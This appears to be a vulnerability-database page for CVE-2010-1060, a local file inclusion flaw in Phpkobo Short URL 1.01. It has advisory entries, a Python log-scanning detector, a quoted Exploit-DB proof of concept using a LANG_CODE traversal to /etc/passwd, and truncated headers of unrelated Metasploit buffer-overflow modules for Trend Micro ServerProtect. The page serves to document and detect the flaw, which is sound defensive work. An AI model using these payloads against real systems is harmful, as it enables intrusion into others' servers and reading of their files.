CVE-2010-1060
Published 2010-03-23
CVE-2010-1060: Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allows remote attackers to include…
Priority: P3 · 37 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.86% (76.5th percentile)
Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the LANG_CODE parameter.
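A log check for the request pattern described above, as an added example that is not part of the advisory or of any indexed rule: it percent-decodes the LANG_CODE value from access-log request lines and flags `..` path segments and NUL bytes. The log lines, the client addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (illustrative, not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 "GET /staff/app/common.inc.php?LANG_CODE=en HTTP/1.1" 200',
    '198.51.100.9 "GET /staff/app/common.inc.php?LANG_CODE=../../etc/passwd%00 HTTP/1.1" 200',
    '198.51.100.9 "GET /staff/app/common.inc.php?LANG_CODE=%252e%252e%252fcfg HTTP/1.1" 200',
    '198.51.100.4 "GET /index.php?q=../x HTTP/1.1" 200',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_PATH = "/staff/app/common.inc.php"  # script named in the CVE description
PARAM = "LANG_CODE"                        # parameter named in the CVE description


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(lang_code):
    """Return the reasons a LANG_CODE value looks like a traversal attempt."""
    value = fully_decode(lang_code)
    reasons = []
    # A ".." segment (either separator) climbs out of the intended directory.
    if ".." in re.split(r"[\\/]", value):
        reasons.append("dot-dot segment")
    # magic_quotes_gpc escapes NUL bytes; with it disabled a raw NUL reaches
    # the script, where PHP of that era truncated file paths at it.
    if "\x00" in value:
        reasons.append("NUL byte")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for suspicious requests to TARGET_PATH."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(TARGET_PATH):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == PARAM and classify(value):
                hits.append((number, classify(value)))
    return hits
```
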
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpkobo | short_url | — | — |
VulDB
Phpkobo Short URL 1.01 common.inc.php LANG_CODE path traversal (EDB-11775 / BID-38731)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1060 [MEDIUM] Phpkobo Short URL 1.01 common.inc.php LANG_CODE path traversal (EDB-11775 / BID-38731)
A vulnerability labeled as problematic has been found in Phpkobo Short URL 1.01. The affected element is an unknown function in the library codelib/cfg/common.inc.php. Executing a manipulation of the argument LANG_CODE can lead to path traversal.
This vulnerability is registered as CVE-2010-1060. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-mj7w-3346-7v97: Directory traversal vulnerability in staff/app/common
ghsa_unreviewed·2022-05-02
CVE-2010-1060 [MEDIUM] CWE-22 GHSA-mj7w-3346-7v97: Directory traversal vulnerability in staff/app/common
Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the LANG_CODE parameter.
No detection rules found.
Exploit-DB
Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-1070 Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'Re
Exploit-DB
Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2508 Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect_createbinding.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MS
Exploit-DB
Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2508 Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect_earthagent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060
EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'Lice
Exploit-DB
Short URL 1.01 - Local File Inclusion
exploitdb·2010-03-16
CVE-2010-1060 Short URL 1.01 - Local File Inclusion
---
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Short URL
# Version: 1.01
# Vendor: http://www.phpkobo.com/short_url.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
################
No writeups or analysis indexed.
http://packetstormsecurity.org/1003-exploits/shorturl-lfi.txt
http://secunia.com/advisories/38968
http://www.exploit-db.com/exploits/11775
http://www.securityfocus.com/bid/38731
Published: 2010-03-23